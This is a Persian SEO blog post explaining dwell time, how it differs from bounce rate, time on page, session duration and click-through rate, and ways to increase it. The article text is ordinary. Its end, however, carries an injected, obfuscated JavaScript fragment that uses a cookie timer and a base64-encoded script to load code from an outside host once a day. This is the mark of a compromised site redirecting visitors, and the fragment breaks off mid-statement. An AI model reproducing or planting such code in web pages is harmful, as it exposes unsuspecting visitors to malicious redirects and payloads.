بدون دیدگاه
2019/11/10
863 بازدید

Dwell time چیست و آیا مدت زمان حضور کاربر در سایت تاثیری در سئو دارد؟

واقعیت این است که dwell time، از جمله فاکتورهای نسبتا مهمی بوده که عموما معنی آن با دیگر فاکتورها و متریک های مهم گوگل مانند بانس ریت (bounce rate)، مدت ماندگاری در صفحه (time on page) نیز اشتباه گرفته می شود و بیشتر اوقات به جای یکدیگر استفاده می شوند. متاسفانه فاکتور مدت زمان حضور کاربر در سایت (dwell time)، برای بسیاری از سئوکاران نامفهوم بوده و از آن به درستی استفاده نمی کنند که ما در این مقاله قصد داریم، توضیحاتی درباره اینکه dwell time چیست و چه تاثیری در سئو دارد؟ و از همه مهمتر تفاوت آن با نرخ پرش و مدت ماندگاری آن در صفحه چیست، حتی  چه راه هایی برای افزایش مدت زمان ماندگاری در سایت است، بدهیم، پس با ما همراه باشید.

Dwell time چیست؟

Dwell time یا همان مدت زمان حضور کاربر در سایت، به مدت زمانی گفته می شود که کاربر کلمه ای را در گوگل جستجو کرده و با انتخاب یکی از لینک ها وارد سایت مورد نظر می شود، به این مدتی که کاربر لینک را انتخاب کرده تا زمانیکه مجدد به همان نتایج جستجو (SERP) بازگردد، dwell time گفته می شود. البته بعضی از کاربران ممکن است چند ثانیه در صفحه مذکور باقی بمانند و بنا به هر دلیلی از آن خارج شوند، اگر به هنگام خروج وارد نتایج جستجو که از اول در آن بوده اند، وارد شوند، عمل dwell time اتفاق افتاده ولی اما اگر صفحه را  کامل ببندند، بدون اینکه هیچ فعالیتی در آن صفحه داشته باشند، عمل بانس ریت یا نرخ پرش اتفاق افتاده است.

اجازه بدید، با یک مثال این عبارت را برای شما توضیح بدهیم:

فرض کنید، شما می خواهید “راههای کاهش بانس ریت” را برای سایت خود پیدا کنید. ابتدا این عبارت را در باکس جستجوی گوگل می نویسید مانند تصویر زیر:

جستجوی راه های کاهش بانس ریت در گوگل

 و بعد از اینتر زدن، نتایجی متناسب با  سوال خود مشاهده خواهید کرد که با توجه به توضیحات هر سایت و قرار گرفتن در ۵ لینک اول، یکی را انتخاب می کنید.

انتخاب یکی از نتایج در گوگل

حال بعد از کلیک کردن وارد آن صفحه می شوید، اگر آن صفحه  پاسخگوی شما بود، مدتی را در آن صفحه می گذرانید و سپس به صفحه نتایج باز می گردید که در این حالت  مدت زمان حضور در سایت برای شما محاسبه می گردد و اگر سایت مورد نظر برای شما مناسب نبود، بدون اینکه فعالیتی در سایت داشته باشید، آن را می بندید که عمل بانس ریت را انجام داده اید، در واقع این یک فاکتور منفی برای سایت مذکور در نظر گرفته می شود و اگر دیگر کاربران هم این عمل را تکرار نمایند، گوگل این سایت را به لینک های پایین تر انتقال می دهد.

Dwell time همان بانس ریت نیست

نرخ پرش  یا bounce rate به درصدی از کاربران که صفحه ای از سایت را دیده باشند، بدون اینکه هیچ فعالیتی مانند انتخاب لینک های داخلی و.. انجام دهند و سایت را بلافاصله ترک نمایند، گفته می شود. به نظر شما چه کسانی سایت را بانس می کنند؟ اما مطمئنا هیچگاه به صفحه نتایج جستجو باز نمی گردند  یا سایت را نمی بندند یا بلافاصله وارد سایت دیگر می شوند. برای اینکه بیشتر با این مفهوم آشنا شوید و راههای کاهش آن را بیابید، مقاله بهترین راههای کاهش بانس ریت با افزایش کانورژن را به شما توصیه می کنیم.

Dwell time همان میانگین مدت ماندگاری کاربران در سایت نیست

average time on page  به مدت زمانی که کاربران در صفحه یا صفحاتی از سایت شما حضور داشته باشند و بدون اینکه آن صفحه را ترک نماید، گفته می شود، البته کاربران ممکن است از طریق شبکه های اجتماعی یا از طریق ایمیل یا دیگر سایت ها به سمت سایت شما وارد شده باشند. شاید  از نظر معنایی، هرسه تعریف شبیه به هم باشند و شما را به شک و شبهه بیاندازند اما دقت کنید که dwell time برگشت به صفحه نتایج جستجو یا همان serp است.

 اما بانس ریت (فاکتور منفی در سئو) و میانگین مدت ماندگاری کاربران در سایت، بستن کل سایت است و هیچگاه به نتایج جستجو باز نمی گردند.

average time on page

مدت زمان حضور کاربر همان session duration نیست

آیا منظور از dwell time همان مدت زمان نشست است؟ جواب خیراست.

 session duration، یک معیار اندازه گیری بوده که کاربر باید مدت زمانی را در سایت بگذراند. حال اگر session کاربری با جستجو آغاز نشده باشد، مطمئنا پایانی هم نخواهد داشت و هیچگاه به صفحه نتایج هم باز نخواهد گشت.

به صورت کلی، session مانند یک ظرفی بوده که دارای گنجایش مشخصی مانند ۳۰ دقیقه می باشد، حال اگر کاربری فعالیت خاصی در یک سایت مانند کلیک بر روی لینک ها، رفتن به رویدادها، خرید محصول و… انجام ندهد، نشست خاصی هم اتفاق نیفتاده است و عمر این ظرف بعد از ۳۰ دقیقه به پایان می رسد.

session in analytics

Dwell time همان نرخ کلیک یا ctr نیست

منظور از ctr همان درصدی است که کاربران بر روی لینکی از سایت که در نتایج جستجو به هنگام جستجوی ارگانیک ظاهر می شود و توسط تعداد زیادی کاربر هم دیده شده است، کلیک می نمایند. شاید این عبارت هم با مدت زمان حضور کاربر در سایت هم اشتباه گرفته شود که همان طور گفته شد، هر دوی این دو واژه کاملا دارای معانی متفاوتی هستند. Dwell time فقط به اتفاقاتی که بعد از کلیک کردن نگاه می کند نه به اینکه چه تعداد کاربران، بر روی لینک دیده شده در گوگل کلیک نمایند. برای آشنایی بیشتر با نرخ کلیک یا ctr میتوانید مقاله مربوط به آن را بخوانید.

در صورتی که نمیدایند چطور می توانید زمان حضور کاربر را در سایت افزایش دهید و یا نرخ کلیک خود را افزایش دهید، می توانید کار را به ویکی دمی بسپرید که برای آشنایی بیشتر با هزینه انجام سئو به شماره ۰۹۱۲۲۸۹۰۹۲۴۸ پیغام دهید.

آیا dwell time یکی از سیگنال های رتبه دهی است؟

این سوال یکی از سوالاتی است که به صورت قطعی نمی توان به آن پاسخ داد و بسیاری از سئوکاران درباره این که دوال تایم به عنوان یک فاکتور مهم در رتبه بندی به حساب می آید، دارای شبه می باشند. در سال ۲۰۱۷،  Nick frost سرپرست google brain، در کنفرانسی اعلام کرد که ” گوگل در حال ادغام یادگیری ماشین است ( فرایندی که گوگل بتواند ارتباط بین جستجو و بهترین صفحه بعد از جستجو را پیدا کند). بنابراین این مدل یادگیری برای زمانی است که که کاربر روی صفحه ای کلیک می کند و سپس در آن صفحه باقی می ماند تا زمانی که به صفحه قبل برگردد “

با جمله بالا می توان فهمید که dwell time یکی از فاکتورهای مهم برای رتبه دهی در سایت می باشد که گوگل تمامی تلاش خود را برای یادگیری آن به کار برده است. در جای دیگر Cyrus Sheoard اعلام کرده که هیچ شخصی از گوگل درباره اینکه مدت زمان حضور کاربر در سایت و نرخ پرش، ۲ فاکتور مهم در رتبه بندی (ranking) هستند، بیانه ای صادر نکرده است. با وجود اینکه google brain در حال تحقیق روی پروژه هوش مصنوعی است اما هنوز به صورت قطعی درباره اینکه dwell time یکی از ranking factor ها است، چیزی اعلام نشده است.

با این حال نباید صحبت های frost ، درباره مدت زمان حضور کاربر در سایت نادیده بگیرید چرا که dwell time به کیفیت و وابستگی محتوای صفحه کاملا بستگی دارد. این جمله در واقع بیانگر این است که موتورهای جستجو بسته به یک متریک خاص،الگوریتم خود را تغییر می دهند. باز هنوز، نمی توان به این سوال پاسخ قطعی داد، امابه نظر من، dwell time را می توان به عنوان یک فاکتور  مهم رتبه بندی بر اساس رفتارهای کاربران در نظر گرفت. اما سوالی که مطرح می شود این است که چطور می توان dwell time را افزایش داد؟؟

چطور می توان dwell time را افزایش داد؟

حالا نوبت آن رسیده که  زمان dwell را افزایش دهید و برای این کار باید بدانید که چطور می توان این کار را انجام داد، پس در ادامه مقاله همراه ویکی دمی باشید.صادقانه باید بگوییم که از تکنیکی که ارائه می دهیم، باید سه مورد آن را جدی بگیرید، در صورتی که بخواهید dwell time را افزایش دهید. این راهکارها به هیچ عنوان جادو نیستند اما می تواند به محتوای شما برای دریافت زمان dwell کمک به سزایی نمایند.

محتوای بهتر تولید کنید

اولین پیشنهاد برای کمک به شما در افزایش زمان سکونت، تولید محتوای بهتر است. بالاخره، اگر محتوای خوبی تولید نکرده باشید، قرار نیست کسی محتوای آبکی و بدون ارزش شما را مطالعه کند.

منظور از محتوا، هم محتواهای متنی، هم اینفوگرافیک و هم فیلم می باشد که باید دارای شرایط زیر باشد: 

  • مفید (عملی یا آموزشی)
  • سرگرم کننده (خنده دار ، غیرمعمول / بی نظیر ، شگفت آور)
  • قابل دسترسی (قابل برنامه ریزی ، گفتگو ، به خوبی طراحی شده)

پس برای تولید محتوا، باید با اصول سئو و نوشتن محتوا آشنایی کافی داشته باشید تا بتوانید محتوایی جذاب و با کیفیت را تولید نمایید.

از لینک های قوی و داخلی استفاده نمایید

از آنجایی که dwell time، یک مقیاس اندازه گیری بین رسیدن به یک صفحه و بازگشت مجدد به همان نتایج جستجو (SERP ) است. این ممکنه احساس شود که خوب کاربر، محتوا را مطالعه نموده و مجددا به صفحه نتایج برگشته است. درست است که کاربر به صفحه نتایج جستجو گوگل برگشته است، اما تا قبل از رسیدن به نتایج، هم مقاله را مطالعه کرده و هم از لینک های داخلی که در آن گذاشته شده است، بازدید کرده و شاید برای او سوالی هم پیش آمده که توانسته در دیدگاه کاربران، آن را مطرح نماید. این کارها، برای گوگل دارای اهمیت بوده و به سایت هایی که کاربران را درگیر می کنند تا زمان بیشتری را در سایت بگذرانند، ارزش و اعتبار می دهد. با استفاده درست از لینک های داخلی، می توان ربات های گوگل را وارد سایت نمود تا کل سایت را بررسی و ایندکس نمایند.

تاکتیک های engagement بهتری را اتخاذ کنید

همانطور که لینک های داخلی به مقالات و صفحات دیگر می تواند بازدید کنندگان را ترغیب کند که مدت زمان طولانی تری در سایت بمانند، تکنیک های مربوط به engagement  و تعامل با کاربر مانند توصیه های محتوا نیز می تواند موثر باشد.

با پیشنهاد مقالات مرتبط به خوانندگان خود، انگیزه قوی برای ماندن در سایت را برای آنها ایجاد نمایید. این روش اگر به درستی اجرا شود می تواند بسیار موثر باشد و هرچه مقالات توصیه شده با محتوای مورد مطالعه خواننده ارتباط نزدیکتری داشته باشند، نه تنها کلیک بیشتری می خورد بلکه مدت زمان بیشتری را هم در سایت برای خواندن نیز می گذرانند. پس، اگر یک بازدید کننده می تواند در مورد موضوع دیگری که مورد علاقه او است بدون بازگشت به SERP اطلاعات بیشتری کسب کند، چرا شما چنین کاری را انجام نمی دهید؟

یک طرح پیمایشی «بدون صفحه» را معرفی کنید

تکنیک دیگری که می توانید برای افزایش زمان سکونت استفاده کنید معرفی یک طرح “بدون صفحه” یا پیمایش برای صفحات وب است.

اگرچه پیمایش صفحات بی نهایت از نظر تجربه کاربری می تواند عالی باشد، اما در صورت ضعیف اجرا شدن می تواند به SEO آسیب برساند. به این دلیل که خزنده های موتورهای جستجو احمق هستند و همیشه نمی توانند رفتار کاربر مانند کلیک یا پیمایش را تکرار کنند.

خوشبختانه ، یک راه حل مفید وجود دارد که به خزنده های موتور جستجو می تواند کمک نماید و به ایندکس و پیمایش آن بپردازد. مهمترین کاری که برای آن بایستی انجام شود،این است که صفحه را به بخش های صفحه بندی تقسیم نمایید. هر بخش دارای یک برچسب <title> مشابه است، با مقادیر rel = “next” و rel = “prev” و در برچسب <head> اعلام شده است.

فعال سازی دیدگاه در انتهای هر پست

یکی از بهترین تکنیک ها برای افزایش dwell time، فعال کردن کادر دیدگاه در انتهای هر پست می باشد. اگر سایت شما دارای چنین امکانی نمی باشد، حتما با نصب پلاگین یا استفاده از کد، آسانترین راه برای افزایش dwell، از خود دریغ نکنید. 

هرچه تعداد سوال و پاسخ در زیر یک پستی زیاد باشد، باعث می شود که تعداد افراد بیشتری نیز به مطالعه آن سوالات بپردازند و حتی ممکن است که آن سوالات، سوال های آنها نیز بوده باشد. خواندن کامنت ها و یا گذاشتن comment باعث افزایش زمان dwell می شود.

نکته: شما می توانید در کامنت های خود از لینک های داخلی هم برای افزایش زمان dwell و هم افزایش زمان ماندگاری کاربر در سایت استفاده نمایید.

افزایش سرعت سایت

یکی دیگر از راه ها برای افزایش dwell time، بالا بردن سرعت سایت می باشد. هر چه سرعت سایت بیشتر باشد، امکان برگشت کاربران و رفتن به صفحات دیگر سایت نیز بیشتر می شود. با افزایش سرعت، امکان اینکه کاربران خود را از دست بدهید خیلی کمتر خواهد شد. بهترین ابزارها برای بررسی سرعت سایت:

استفاده از Mobile First

همانطور که میدانید، عمده ترین ترافیک ها از سمت موبایل به سایت ها روانه می شوند. این حرف بدان معنا است که باید در ابتدا به طراحی سایت برای موبایل متمرکز باشید و سپس سایت را برای دسکتاپ پیاده سازی نمایید. برای آنکه متوجه شوید که سایت شما برای موبایل هم طراحی شده است و ریسپانسیو بوده است، می توانید مراحل زیر را طی نمایید:

1- ابتدا وارد سرچ کنسول شوید.

2-بر روی mobile useability  کلیک کنید.

3-اگر شاهد خطا و اروری در این بخش بودید، حتما بر روی آن ارور کلیک نمایید تا سریعتر به رفع آن بپردازید.

mobile useability

اگر شما اطلاعات کافی درباره خطاها ندارید می توانید از داکیومنتی که خود گوگل به عنوان راهنما گذاشته است، استفاده نمایید.

افزایش dwell time با مطابقت داشتن سرچ کاربر

اگر به دنبال کسب رتبه تاپ در نتایج جستجوی گوگل هستید، حتما باید محتوایی که آماده می کنید با کلمه کلیدی که کاربر آن را جستجو می کند، مطابقت داشته باشد. با وجودیکه خیلی از سایت ها به تولید محتوا برای کلمات کلیدی پر سرچ کاربران می پردازند اما گوگل متوجه می شود که کدام یک از سایت ها دچار بانس شده اند و کدام یک از سایت ها به علت داشتن محتوای با کیفیت یا سرعت بالا، کاربر را در سایت خود نگه داشته اند. 

عموما کاربران به دنبال جستجوی کلمه خاصی هستند، می خواهند با برند جدیدی آشنا شوند یا برند مورد نظر خود را سرچ کنند یا اینکه به دنبال یادگیری و برطرف کردن مشکل خود هستند، به گوگل مراجعه می کنند. در حال حاضر، اکثر سرچ ها به سمت محلی شدن یک کسب و کار در حال جریان است و مثلا نزدیک ترین رستوران به محل زندگی من و… نیز سرچ می شود.

امیدوارم این مقاله توانسته باشد، به  تعدادی از سوالات شما عزیزان پاسخ داده باشد. برای یادگیری هیچ وقت دیر نیست اگر به دنبال آموزش رایگان سئو می گردید، حتما بر روی لینک کلیک کنید و سوالات و نظرات خود را از ما بپرسید.

{var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

*
*